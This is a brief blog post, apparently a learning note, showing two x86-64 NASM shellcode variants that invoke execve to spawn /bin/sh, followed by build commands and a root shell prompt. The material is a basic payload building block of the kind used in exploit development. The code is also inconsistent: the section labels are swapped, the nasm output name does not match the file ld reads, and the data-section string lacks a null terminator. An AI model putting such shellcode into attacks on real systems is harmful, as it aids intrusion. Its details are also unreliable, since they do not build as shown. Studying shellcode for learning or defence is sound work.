not optimized for shortness
does not remove null (00) characters
--------
using data
--------
section .text
global _start
_start:
xor rdi, rdi ;null char to term string
push rdi
mov rdi, 0x68732f6e69622f2f ; //bin/sh
push rdi
mov rdi, rsp ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
--------
using push
--------
section .data
sh: db "//bin/sh"
section .text
global _start
_start:
mov rdi, sh ; filename
mov rsi, 0 ; argv
mov rdx, 0 ;envp
mov rax, 59 ; execve syscall
syscall
------
to compile
------
$> nasm -f elf64 mycode.asm -o mycode
$> ld mycode.o -o mycode
$> ./mycode
# whoami
root
Showing posts with label nasm. Show all posts
Showing posts with label nasm. Show all posts
Tuesday, March 10, 2020
Subscribe to:
Posts (Atom)